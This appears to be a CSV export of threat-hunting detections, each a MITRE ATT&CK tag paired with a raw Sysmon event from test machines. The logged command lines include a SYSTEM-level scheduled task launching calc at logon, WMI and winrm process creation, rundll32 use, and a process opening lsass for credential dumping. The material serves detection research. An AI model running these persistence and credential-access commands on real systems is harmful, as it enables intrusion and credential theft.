[T1059] Command-Line Interface,1553028158.70443,2019-03-20T00:42:38.704430+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /c msg * &quot;hello from run key&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T20:42:38.654358Z"">
</TimeCreated>
<EventRecordID>1966330</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 20:42:38.043</Data>
<Data Name=""ProcessGuid"">365ABB72-543E-5C91-0000-001009C90300</Data>
<Data Name=""ProcessId"">3068</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /c msg * &quot;hello from run key&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
<Data Name=""LogonId"">0x33435</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-543D-5C91-0000-001099A60300</Data>
<Data Name=""ParentProcessId"">2984</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1003] Credential Dumping - Process Access,1556608980.899263,2019-04-30T11:23:00.899263+04:00,,Threat,High,[T1003] Credential Dumping - Process Access,10,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>10</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>10</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T07:23:00.899263Z"">
</TimeCreated>
<EventRecordID>8341</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1876"" ThreadID=""1444"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 07:23:00.883</Data>
<Data Name=""SourceProcessGUID"">365ABB72-F7C9-5CC7-0000-0010BF010E00</Data>
<Data Name=""SourceProcessId"">3772</Data>
<Data Name=""SourceThreadId"">1088</Data>
<Data Name=""SourceImage"">D:\m.exe</Data>
<Data Name=""TargetProcessGUID"">365ABB72-F6A1-5CC7-0000-001072590000</Data>
<Data Name=""TargetProcessId"">492</Data>
<Data Name=""TargetImage"">C:\Windows\system32\lsass.exe</Data>
<Data Name=""GrantedAccess"">0x1410</Data>
<Data Name=""CallTrace"">C:\Windows\SYSTEM32\ntdll.dll+4595c|C:\Windows\system32\KERNELBASE.dll+8185|UNKNOWN(01770343)|UNKNOWN(0176FF9D)|UNKNOWN(0176F8EC)|UNKNOWN(00397486)|UNKNOWN(003973A0)|UNKNOWN(003978A3)|C:\Windows\system32\kernel32.dll+4ef8c|C:\Windows\SYSTEM32\ntdll.dll+6367a|C:\Windows\SYSTEM32\ntdll.dll+6364d</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436080.38552,2019-07-30T01:34:40.385520+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c schtasks /create /tn &quot;mysc&quot; /tr C:\windows\system32\calc.exe /sc ONLOGON /ru &quot;System&quot; /f ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:40.261289Z"">
</TimeCreated>
<EventRecordID>5000</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:40.243</Data>
<Data Name=""ProcessGuid"">747F3D96-6670-5D3F-0000-001099048F00</Data>
<Data Name=""ProcessId"">2916</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c schtasks /create /tn &quot;mysc&quot; /tr C:\windows\system32\calc.exe /sc ONLOGON /ru &quot;System&quot; /f</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1564436076.548587,2019-07-30T01:34:36.548587+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( calc ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:36.534474Z"">
</TimeCreated>
<EventRecordID>4998</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:36.528</Data>
<Data Name=""ProcessGuid"">747F3D96-666C-5D3F-0000-00104BB78E00</Data>
<Data Name=""ProcessId"">3872</Data>
<Data Name=""Image"">C:\Windows\System32\calc.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Calculator</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">calc</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6642-5D3F-0000-001044A68A00</Data>
<Data Name=""ParentProcessId"">2996</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1587853177.495367,2020-04-26T02:19:37.495367+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-04-25T22:19:37.209189Z"">
</TimeCreated>
<EventRecordID>27803</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3572"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-04-25 22:19:27.149</Data>
<Data Name=""ProcessGuid"">747F3D96-B76F-5EA4-0000-0010624D0600</Data>
<Data Name=""ProcessId"">5840</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-B767-5EA4-0000-00209BD30100</Data>
<Data Name=""LogonId"">0x1d39b</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-B769-5EA4-0000-001000800300</Data>
<Data Name=""ParentProcessId"">4472</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1564436076.548587,2019-07-30T01:34:36.548587+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( calc ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:36.534474Z"">
</TimeCreated>
<EventRecordID>4998</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:36.528</Data>
<Data Name=""ProcessGuid"">747F3D96-666C-5D3F-0000-00104BB78E00</Data>
<Data Name=""ProcessId"">3872</Data>
<Data Name=""Image"">C:\Windows\System32\calc.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Calculator</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">calc</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6642-5D3F-0000-001044A68A00</Data>
<Data Name=""ParentProcessId"">2996</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1587853177.495367,2020-04-26T02:19:37.495367+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-04-25T22:19:37.209189Z"">
</TimeCreated>
<EventRecordID>27803</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3572"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-04-25 22:19:27.149</Data>
<Data Name=""ProcessGuid"">747F3D96-B76F-5EA4-0000-0010624D0600</Data>
<Data Name=""ProcessId"">5840</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-B767-5EA4-0000-00209BD30100</Data>
<Data Name=""LogonId"">0x1d39b</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-B769-5EA4-0000-001000800300</Data>
<Data Name=""ParentProcessId"">4472</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1587853177.495367,2020-04-26T02:19:37.495367+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-04-25T22:19:37.209189Z"">
</TimeCreated>
<EventRecordID>27803</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3572"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-04-25 22:19:27.149</Data>
<Data Name=""ProcessGuid"">747F3D96-B76F-5EA4-0000-0010624D0600</Data>
<Data Name=""ProcessId"">5840</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-B767-5EA4-0000-00209BD30100</Data>
<Data Name=""LogonId"">0x1d39b</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-B769-5EA4-0000-001000800300</Data>
<Data Name=""ParentProcessId"">4472</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1059 ] wscript or cscript runing script,1564436075.91801,2019-07-30T01:34:35.918010+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript //nologo &quot;C:\Windows\System32\winrm.vbs&quot; i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;}) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;}) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:35.878709Z"">
</TimeCreated>
<EventRecordID>4994</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:35.763</Data>
<Data Name=""ProcessGuid"">747F3D96-666B-5D3F-0000-0010EF858E00</Data>
<Data Name=""ProcessId"">264</Data>
<Data Name=""Image"">C:\Windows\System32\cscript.exe</Data>
<Data Name=""FileVersion"">5.812.10240.16384</Data>
<Data Name=""Description"">Microsoft ® Console Based Script Host</Data>
<Data Name=""Product"">Microsoft ® Windows Script Host</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cscript //nologo &quot;C:\Windows\System32\winrm.vbs&quot; i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;}</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC</Data>
<Data Name=""ParentProcessGuid"">747F3D96-666B-5D3F-0000-001033648E00</Data>
<Data Name=""ParentProcessId"">1580</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;}</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1564436075.91801,2019-07-30T01:34:35.918010+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cscript.exe ) through command line ( cscript //nologo &quot;C:\Windows\System32\winrm.vbs&quot; i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;} ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:35.878709Z"">
</TimeCreated>
<EventRecordID>4994</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:35.763</Data>
<Data Name=""ProcessGuid"">747F3D96-666B-5D3F-0000-0010EF858E00</Data>
<Data Name=""ProcessId"">264</Data>
<Data Name=""Image"">C:\Windows\System32\cscript.exe</Data>
<Data Name=""FileVersion"">5.812.10240.16384</Data>
<Data Name=""Description"">Microsoft ® Console Based Script Host</Data>
<Data Name=""Product"">Microsoft ® Windows Script Host</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cscript //nologo &quot;C:\Windows\System32\winrm.vbs&quot; i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;}</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC</Data>
<Data Name=""ParentProcessGuid"">747F3D96-666B-5D3F-0000-001033648E00</Data>
<Data Name=""ParentProcessId"">1580</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;}</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1059 ] wscript or cscript runing script,1564436075.878709,2019-07-30T01:34:35.878709+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript //nologo &quot;C:\Windows\System32\winrm.vbs&quot; qc -q) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c winrm qc -q) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:35.838188Z"">
</TimeCreated>
<EventRecordID>4993</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:35.663</Data>
<Data Name=""ProcessGuid"">747F3D96-666B-5D3F-0000-00102F7F8E00</Data>
<Data Name=""ProcessId"">3224</Data>
<Data Name=""Image"">C:\Windows\System32\cscript.exe</Data>
<Data Name=""FileVersion"">5.812.10240.16384</Data>
<Data Name=""Description"">Microsoft ® Console Based Script Host</Data>
<Data Name=""Product"">Microsoft ® Windows Script Host</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cscript //nologo &quot;C:\Windows\System32\winrm.vbs&quot; qc -q</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
